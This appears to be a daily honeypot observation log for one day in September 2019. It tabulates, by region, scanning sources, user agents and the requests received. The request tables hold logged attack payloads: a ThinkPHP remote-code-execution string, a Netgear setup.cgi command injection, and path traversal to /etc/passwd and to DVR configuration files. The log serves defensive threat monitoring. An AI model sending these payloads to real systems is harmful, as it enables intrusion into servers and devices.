Honeypot (tentative) observation log for 2019/09/09.
Highlights
Region:AP
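The following were observed:
- Access targeting vulnerabilities in HiSilicon DVR devices
- Access targeting ThinkPHP vulnerabilities
- Scanning by zgrab
- Unauthorized communication related to 110[.]249[.]212[.]46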
Region:US
The following were observed:
- Access targeting vulnerabilities in HiSilicon DVR devices
- Scanning for phpMyAdmin
- Scanning by zgrab
Region:EU
The following were observed:
- Access targeting ThinkPHP vulnerabilities
- Unauthorized communication related to 5[.]188[.]210[.]101
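Other
Access count trend
AP: total accesses: 47 (change from previous day: -1)
US: total accesses: 139 (change from previous day: +7)
EU: total accesses: 15 (change from previous day: -5)
For practical reasons, GET / HTTP/1.1 and POST / HTTP/1.1 requests are excluded.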
Region:AP
Source IP addresses
Count | Source IP address | Country |
---|---|---|
4 | 103.23.42.207 | Bangladesh |
1 | 103.81.139.38 | India |
2 | 103.86.43.71 | India |
4 | 106.13.115.247 | China |
6 | 110.249.212.46 | China |
1 | 113.190.147.227 | Vietnam |
2 | 138.68.208.7 | United States |
1 | 14.169.231.91 | Vietnam |
2 | 159.203.199.119 | United States |
1 | 159.203.199.27 | United States |
1 | 159.203.203.45 | United States |
1 | 168.227.56.70 | Brazil |
1 | 187.188.129.59 | Mexico |
1 | 190.92.58.91 | Honduras |
1 | 193.188.22.56 | Russia |
1 | 203.45.32.34 | Australia |
1 | 213.165.179.62 | Malta |
4 | 52.82.51.105 | China |
1 | 66.249.73.199 | United States |
1 | 74.12.95.231 | Canada |
1 | 82.127.237.205 | France |
2 | 83.143.86.62 | Norway |
1 | 89.183.101.103 | Germany |
5 | 89.248.174.219 | Netherlands |
1 | 95.172.58.22 | Russia |
UserAgent list
Count | UserAgent |
---|---|
25 | - |
3 | Go-http-client/1.1 |
1 | Mozilla/5.0 |
1 | Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) |
9 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
8 | Mozilla/5.0 zgrab/0.x |
Request list
Count | Method | Request | Protocol |
---|---|---|---|
1 | GET | /admin.php | HTTP/1.1 |
6 | GET | http://110[.]249[.]212[.]46/testget?q=23333&port=80 | HTTP/1.1 |
5 | GET | /lang/en/html/index.html | HTTP/1.1 |
1 | GET | /Lists/admin.php | HTTP/1.1 |
3 | GET | /manager/html | HTTP/1.1 |
3 | GET | /manager/text/list | HTTP/1.1 |
13 | GET | ../../mnt/custom/ProductDefinition | HTTP |
1 | GET | /robots.txt | HTTP/1.1 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/&currentsetting.htm=1 | HTTP/1.1 |
3 | GET | /TP/index.php | HTTP/1.1 |
3 | GET | /TP/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
3 | GET | /TP/public/index.php | HTTP/1.1 |
3 | POST | /TP/index.php?s=captcha | HTTP/1.1 |
1 | \x03 |
Region:US
Source IP addresses
Count | Source IP address | Country |
---|---|---|
6 | 103.105.196.2 | Indonesia |
1 | 116.107.171.53 | Vietnam |
1 | 131.100.47.32 | Brazil |
1 | 138.68.208.23 | United States |
1 | 159.203.203.48 | United States |
101 | 167.71.117.61 | United States |
1 | 171.103.53.22 | Thailand |
1 | 177.130.193.133 | Brazil |
4 | 177.235.237.136 | Brazil |
1 | 187.181.147.220 | Brazil |
4 | 187.181.21.49 | Brazil |
1 | 187.188.211.196 | Mexico |
1 | 187.191.62.8 | Mexico |
1 | 195.208.137.35 | Russia |
1 | 213.49.174.24 | Belgium |
1 | 219.92.69.110 | Malaysia |
1 | 60.13.157.219 | China |
3 | 77.139.214.46 | Israel |
1 | 82.76.133.229 | Romania |
2 | 83.143.86.62 | Norway |
1 | 83.99.234.226 | Latvia |
4 | 89.248.174.219 | Netherlands |
UserAgent list
Count | UserAgent |
---|---|
25 | - |
9 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36 |
101 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 |
4 | Mozilla/5.0 zgrab/0.x |
Request list
Count | Method | Request | Protocol |
---|---|---|---|
1 | GET | /admin.php | HTTP/1.1 |
1 | GET | ../../etc/passwd | HTTP/1.1 |
2 | GET | /lang/en/html/index.html | HTTP/1.1 |
1 | GET | /Lists/admin.php | HTTP/1.1 |
1 | GET | /manager/html | HTTP/1.1 |
1 | GET | /manager/text/list | HTTP/1.1 |
21 | GET | ../../mnt/custom/ProductDefinition | HTTP |
1 | GET | ../../mnt/custom/ProductDefinition | HTTP/1.1 |
2 | GET | /mysql/admin/index.php?lang=en | HTTP/1.1 |
2 | GET | /mysql/dbadmin/index.php?lang=en | HTTP/1.1 |
1 | GET | /mysql/mysqlmanager/index.php?lang=en | HTTP/1.1 |
2 | GET | /mysql/sqlmanager/index.php?lang=en | HTTP/1.1 |
101 | GET | /phpmyadmin/ | HTTP/1.1 |
1 | GET | /phpmyadmin/index.php?lang=en | HTTP/1.1 |
1 | GET | /phpMyadmin/index.php?lang=en | HTTP/1.1 |
Region:EU
Source IP addresses
Count | Source IP address | Country |
---|---|---|
1 | 159.203.199.97 | United States |
1 | 159.203.203.89 | United States |
1 | 193.188.22.56 | Russia |
10 | 39.135.1.156 | China |
1 | 5.188.210.101 | Russia |
1 | 89.248.174.219 | Netherlands |
UserAgent list
Count | UserAgent |
---|---|
2 | - |
1 | Go-http-client/1.1 |
1 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 |
9 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
2 | Mozilla/5.0 zgrab/0.x |
Request list
Count | Method | Request | Protocol |
---|---|---|---|
1 | GET | /elrekt.php | HTTP/1.1 |
1 | GET | /html/public/index.php | HTTP/1.1 |
1 | GET | http://5[.]188[.]210[.]101/echo.php | HTTP/1.1 |
1 | GET | /index.php | HTTP/1.1 |
1 | GET | /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
1 | GET | /lang/en/html/index.html | HTTP/1.1 |
1 | GET | /manager/html | HTTP/1.1 |
1 | GET | /manager/text/list | HTTP/1.1 |
1 | GET | /public/index.php | HTTP/1.1 |
1 | GET | /thinkphp/html/public/index.php | HTTP/1.1 |
1 | GET | /TP/html/public/index.php | HTTP/1.1 |
1 | GET | /TP/index.php | HTTP/1.1 |
1 | GET | /TP/public/index.php | HTTP/1.1 |
1 | POST | /index.php?s=captcha | HTTP/1.1 |
1 | \x03 |